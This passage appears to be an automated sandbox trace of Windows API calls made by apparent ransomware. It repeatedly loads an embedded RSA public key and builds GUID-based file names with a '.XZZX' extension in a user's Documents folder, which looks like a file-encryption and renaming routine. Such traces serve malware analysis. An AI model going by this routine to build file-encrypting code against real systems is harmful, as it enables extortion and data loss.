LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.542] lstrcpyW (in: lpString1=0x2daf460, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0231.542] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.542] SetErrorMode (uMode=0x1) returned 0x1 [0231.542] lstrcpyW (in: lpString1=0x2daf860, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0231.542] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x5d014c1d, Data2=0x6a8d, Data3=0x4ea0, Data4=([0]=0x96, [1]=0x20, [2]=0xb5, [3]=0x10, [4]=0x55, [5]=0x5, [6]=0xd3, [7]=0x9d))) returned 0x0 [0231.542] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D8B4FBC032E124E029E6603236DA0928.XZZX") returned 81 [0231.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0231.542] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C33AEDF920B98E205D014C1D23947268.XZZX") returned 81 [0231.542] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 893 os_tid = 0x10f8 [0231.697] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.697] lstrcpyW (in: lpString1=0x2daf460, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0231.697] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.697] SetErrorMode (uMode=0x1) returned 0x1 [0231.697] lstrcpyW (in: lpString1=0x2daf860, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0231.697] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xc30f4615, Data2=0x7c0d, Data3=0x4710, Data4=([0]=0xa3, [1]=0x47, [2]=0x79, [3]=0x42, [4]=0x3f, [5]=0x7c, [6]=0x9b, [7]=0x7b))) returned 0x0 [0231.697] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E1CB2DE23002B20E4903A282342F9656.XZZX") returned 81 [0231.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0231.698] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4DB8BB11226F5BD0C30F4615254A4018.XZZX") returned 81 [0231.698] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 894 os_tid = 0x1100 [0231.856] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.856] lstrcpyW (in: lpString1=0x2daf460, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0231.856] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0231.856] SetErrorMode (uMode=0x1) returned 0x1 [0231.856] lstrcpyW (in: lpString1=0x2daf860, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0231.856] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xf6fa3de8, Data2=0x318b, Data3=0x428e, Data4=([0]=0x92, [1]=0x52, [2]=0xe6, [3]=0xfe, [4]=0xe8, [5]=0x53, [6]=0x1d, [7]=0xa6))) returned 0x0 [0231.856] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\1B49D0D52A00521DE10DAFA32E183665.XZZX") returned 102 [0231.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0231.856] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\FFB904F80CE1511AF6FA3DE80FBC3562.XZZX") returned 102 [0231.856] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 895 os_tid = 0x1104 [0232.009] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.009] lstrcpyW (in: lpString1=0x2daf460, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0232.009] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.009] SetErrorMode (uMode=0x1) returned 0x1 [0232.009] lstrcpyW (in: lpString1=0x2daf860, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0232.009] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x56e734bf, Data2=0x4c52, Data3=0x4f3c, Data4=([0]=0x87, [1]=0xc8, [2]=0x18, [3]=0x18, [4]=0x74, [5]=0xb3, [6]=0xa6, [7]=0x33))) returned 0x0 [0232.009] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned 102 [0232.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0232.009] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\79B7992E179F313856E734BF1A7A1580.XZZX") returned 102 [0232.010] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 896 os_tid = 0x1108 [0232.166] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.166] lstrcpyW (in: lpString1=0x2daf460, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0232.166] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.166] SetErrorMode (uMode=0x1) returned 0x1 [0232.166] lstrcpyW (in: lpString1=0x2daf860, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0232.166] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x116e5026, Data2=0xb24c, Data3=0x4f81, Data4=([0]=0xbe, [1]=0x3d, [2]=0xaf, [3]=0x37, [4]=0x20, [5]=0xf8, [6]=0x98, [7]=0x9c))) returned 0x0 [0232.166] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\2525214410F7DA278BE33B7C150FBE6F.XZZX") returned 102 [0232.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0232.166] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\E07A3748375F4C4C116E50263A3A3094.XZZX") returned 102 [0232.166] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 897 os_tid = 0x110c [0232.322] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.322] lstrcpyW (in: lpString1=0x2daf460, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0232.322] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.322] SetErrorMode (uMode=0x1) returned 0x1 [0232.322] lstrcpyW (in: lpString1=0x2daf860, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0232.322] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x72edbe9d, Data2=0x9609, Data3=0x4318, Data4=([0]=0x9f, [1]=0x2a, [2]=0xc9, [3]=0xbc, [4]=0x14, [5]=0xeb, [6]=0x59, [7]=0xc3))) returned 0x0 [0232.322] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\3D3271B13FFA5012E003EAB54427345A.XZZX") returned 102 [0232.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0232.322] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\580BB18527526BD872EDBE9D2A2D5020.XZZX") returned 102 [0232.322] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 898 os_tid = 0x1110 [0232.477] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.477] lstrcpyW (in: lpString1=0x2daf460, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0232.477] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.477] SetErrorMode (uMode=0x1) returned 0x1 [0232.477] lstrcpyW (in: lpString1=0x2daf860, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0232.477] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x2c13e380, Data2=0xd302, Data3=0x4daa, Data4=([0]=0xac, [1]=0x6a, [2]=0xdd, [3]=0x85, [4]=0x43, [5]=0x3a, [6]=0x88, [7]=0xda))) returned 0x0 [0232.477] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\4718805A3B556C301085A1313FC25078.XZZX") returned 102 [0232.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0232.477] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\BCAA47004003B9542C13E38042DE9D9C.XZZX") returned 102 [0232.477] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 899 os_tid = 0x1114 [0232.634] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.634] lstrcpyW (in: lpString1=0x2daf460, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0232.634] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.634] SetErrorMode (uMode=0x1) returned 0x1 [0232.634] lstrcpyW (in: lpString1=0x2daf860, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0232.634] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x28488b8e, Data2=0x55e5, Data3=0x43bd, Data4=([0]=0x9d, [1]=0xc4, [2]=0x20, [3]=0xf5, [4]=0x9e, [5]=0xd0, [6]=0x4a, [7]=0x94))) returned 0x0 [0232.634] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned 102 [0232.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0232.634] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\1F3AFC0616BA591128488B8E19953D59.XZZX") returned 102 [0232.634] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 900 os_tid = 0x1118 [0232.790] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 